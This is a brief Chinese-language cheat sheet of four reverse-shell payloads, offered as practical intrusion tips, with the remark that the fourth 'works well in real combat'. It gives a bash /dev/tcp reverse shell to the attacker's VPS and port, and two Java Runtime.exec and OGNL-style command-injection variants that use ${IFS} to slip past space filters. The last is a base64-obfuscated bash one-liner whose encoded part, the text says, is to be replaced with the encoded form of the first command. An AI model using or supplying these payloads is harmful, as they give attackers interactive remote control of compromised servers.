通常1不能直接獲取反彈Shell,實戰中4很好用
1
bash -i >& /dev/tcp/你的vps ip/監聽端口 0>&1 #大部分情況直接執行這個命令不能彈,用下面的
2
Runtime.getRuntime().exec("/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/你的vps ip/監聽端口<&1");
3
@java.lang.Runtime@getRuntime().exec('/bin/bash -c bash${IFS}-i${IFS}>&/dev/tcp/你的vps ip/監聽端口<&1')
4
bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzEyNy4wLjAuMS8xMjM0NSAwPiYx}|{base64,-d}|{bash,-i} #中間內容替換為1中的Base64